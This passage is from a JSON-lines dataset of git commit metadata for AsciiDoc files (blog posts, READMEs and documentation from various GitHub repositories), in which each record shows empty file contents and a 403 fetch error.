DROP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-21-PS3-Slim-Unboxing--PRICE-DROP.adoc","new_file":"_posts\/2011-10-21-PS3-Slim-Unboxing--PRICE-DROP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ad3b16ba4dd632ff14bf609b6c5ea92bc2e214b","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca6f50014506f93cf205e99bea55e8d89bf21e2","subject":"y2b create post $3 Beer Can vs $200 Beer Gadget","message":"y2b create post $3 Beer Can vs $200 Beer Gadget","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-01-3-Beer-Can-vs-200-Beer-Gadget.adoc","new_file":"_posts\/2017-01-01-3-Beer-Can-vs-200-Beer-Gadget.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c96eada1a9ec43db64bbf8fd6d6905dfeee4a69e","subject":"Create README.asciidoc","message":"Create 
README.asciidoc","repos":"st33n\/cv,st33n\/cv","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/st33n\/cv.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51c9387fcdb3cc9840d7f267f447ea7a334d2eeb","subject":"working on readme file","message":"working on readme file\n","repos":"leonardoce\/predo,leonardoce\/predo","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonardoce\/predo.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9d20868fea27da833cad1bcd6da7e93fb2809bea","subject":"Clarify max_connections + NbAcceptors + backlog in the guide","message":"Clarify max_connections + NbAcceptors + backlog in the guide\n","repos":"layerhq\/ranch,ninenines\/ranch,K2InformaticsGmbH\/ranch","old_file":"doc\/src\/guide\/listeners.asciidoc","new_file":"doc\/src\/guide\/listeners.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/K2InformaticsGmbH\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"99d9b088beb3746d47ca439df7200ec71b852143","subject":"Create 2015-09-01-forge-2.19.0.final.asciidoc","message":"Create 2015-09-01-forge-2.19.0.final.asciidoc","repos":"luiz158\/docs,forge\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2015-09-01-forge-2.19.0.final.asciidoc","new_file":"news\/2015-09-01-forge-2.19.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9297a5e1b250bd8b03188900662c90e8a4b0bf1a","subject":"Configuring providers guide","message":"Configuring providers guide\n\nCo-authored-by: Stian Thorgersen <stian@redhat.com>\n\nCloses #10400\n","repos":"srose\/keycloak,stianst\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,raehalme\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,keycloak\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,stianst\/keycloak,raehalme\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,raehalme\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,keycloak\/keycloak,mhajas\/keycloak,srose\/keycloak,srose\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,abstractj\/keycloak,mhajas\/keycloak,ahus1\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,srose\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,srose\/keycloak,abstractj\/keycloak,ahus1\/keycloak,stianst\/keycloak,raehalme\/keycloak","old_file":"docs\/guides\/src\/main\/server\/configuration-provider.adoc","new_file":"docs\/guides\/src\/main\/server\/configuration-provider.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f079f7dd8a3cbc091cbfd446fe4b09996e863b5f","subject":"y2b create post Koss TBSE1 Headphones Unboxing (Tony Bennett Signature Edition)","message":"y2b create post Koss TBSE1 Headphones Unboxing (Tony Bennett Signature Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-15-Koss-TBSE1-Headphones-Unboxing-Tony-Bennett-Signature-Edition.adoc","new_file":"_posts\/2012-03-15-Koss-TBSE1-Headphones-Unboxing-Tony-Bennett-Signature-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f98886e293839caa9886c9bdfb22b70d4af029ec","subject":"Added a Technology Preview module","message":"Added a Technology Preview module\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/technology-preview.adoc","new_file":"modules\/technology-preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"307a16bdd1b4a4b34b33eda3c3d5f5c1061129d4","subject":"y2b create post Saints Row 3 \\\/ Assassins Creed Revelations MIDNIGHT LAUNCH!","message":"y2b create post Saints Row 3 \\\/ Assassins Creed Revelations MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-14-Saints-Row-3--Assassins-Creed-Revelations-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2011-11-14-Saints-Row-3--Assassins-Creed-Revelations-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"953928b2c5734b4e274040cf46aecd3b31c399eb","subject":"typo fix (it self -> itself) (#21781)","message":"typo fix (it self -> itself) (#21781)\n\n* typo fix.\r\n\r\n* apply \"stored field value\"\r\n\r\n* replaced \"whereas\" with \"on the 
contrary\"\r\n","repos":"glefloch\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,sneivandt\/elasticsearch,nilabhsagar\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,JackyMai\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,bawse\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsea
rch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,nilabhsagar\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,jimczi\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,alexshadow007\/elasticse
arch,gfyoung\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,JackyMai\/elasticsearch,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,MaineC\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elassandra,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/search\/request\/stored-fields.asciidoc","new_file":"docs\/reference\/search\/request\/stored-fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff7cbb28f1ce36304acfd65af9051d2742f0e3d3","subject":"Update 2017-01-10-RICHTIGSTELLUNG.adoc","message":"Update 2017-01-10-RICHTIGSTELLUNG.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-10-RICHTIGSTELLUNG.adoc","new_file":"_posts\/2017-01-10-RICHTIGSTELLUNG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3ea01904dcdb55463130d9f2bd01d84ce31148b","subject":"Update 2019-01-31-Wolfgang-Reszel.adoc","message":"Update 2019-01-31-Wolfgang-Reszel.adoc","repos":"Tekl\/tekl.github.io,Tekl\/tekl.github.io,Tekl\/tekl.github.io,Tekl\/tekl.github.io","old_file":"_posts\/2019-01-31-Wolfgang-Reszel.adoc","new_file":"_posts\/2019-01-31-Wolfgang-Reszel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Tekl\/tekl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf387650d83d3abba9818455ba71e1c00b625df","subject":"Update 2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","message":"Update 
2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","new_file":"_posts\/2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df4722dea1fade4cd6c7c5d5dd725b62fdabc722","subject":"Update manual.adoc","message":"Update manual.adoc","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual.adoc","new_file":"src\/docs\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5700aa29fcc8c9ad55580364cc402ec9e9a13aea","subject":"Update 2015-02-20-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-20-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-20-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45b2d75d7a3abc1ecd71d3f3253e7481a6369406","subject":"Create README.adoc","message":"Create README.adoc","repos":"Jiri-Kremser\/hawkular-agent,pilhuhn\/hawkular-agent,hawkular\/hawkular-agent,Jiri-Kremser\/hawkular-agent,hawkular\/hawkular-agent,pilhuhn\/hawkular-agent,jpkrohling\/hawkular-agent,Jiri-Kremser\/hawkular-agent,hawkular\/hawkular-agent,pilhuhn\/hawkular-agent,jpkrohling\/hawkular-agent","old_file":"hawkular-wildfly-agent-itest-parent\/hawkular-wildfly-agent-command-cli\/README.adoc","new_file":"hawkular-wildfly-agent-itest-parent\/hawkular-wildfly-agent-command-cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpkrohling\/hawkular-agent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c525928a4e257e2a764adf51f9be10265c81636d","subject":"Update 2017-09-04-Ethereum.adoc","message":"Update 2017-09-04-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-04-Ethereum.adoc","new_file":"_posts\/2017-09-04-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5066dd110e11cbb060c13a34ea3b058a29c16274","subject":"y2b create post Is This Ear Technology The Future?","message":"y2b create post Is This Ear Technology The 
Future?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-21-Is-This-Ear-Technology-The-Future.adoc","new_file":"_posts\/2016-12-21-Is-This-Ear-Technology-The-Future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093216f3194f46830d55045f521a2a04d02c42bc","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b7b3381ae8f47209c8bdcb4650a74201b11fa08","subject":"Add an index file, to make GH pages happy","message":"Add an index file, to make GH pages happy\n","repos":"divvun\/kbdgen,divvun\/kbdgen,divvun\/kbdgen","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/divvun\/kbdgen.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68ad464b676486620bf1f5c254e819c3ad810492","subject":"Add minimal Contributor guidelines","message":"Add minimal Contributor guidelines\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adfaeeccadedce2631c060000d90983651b32cc5","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28a4eb45102c0ba76b30b832331a731bc6cff391","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be8ec9bb848034b215a5f61adda36fc36be98c8","subject":"Minor wording Ecl","message":"Minor wording Ecl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev 
tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e6e5da24c6ccec28555720e04eb1eaa3f47708","subject":"Update License info","message":"Update License info","repos":"prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"610bf708a77f10f5386b85978da23d95646863e9","subject":"Updated README","message":"Updated README\n","repos":"logicus4078\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client,logicus4078\/vertx-jdbc-client,logicus4078\/vertx-jdbc-client,vert-x3\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-jdbc-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf85445bea60c09af15025e7ddd577c18a8b3ea6","subject":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","message":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"848c94246ff153a3c542e6c4b048eac155db8086","subject":"y2b create post You've Never Seen A Mug Do This...","message":"y2b create post You've Never Seen A Mug Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-27-Youve-Never-Seen-A-Mug-Do-This.adoc","new_file":"_posts\/2017-05-27-Youve-Never-Seen-A-Mug-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63938319b4f91e11b4b09fdac108c4b830a880a5","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 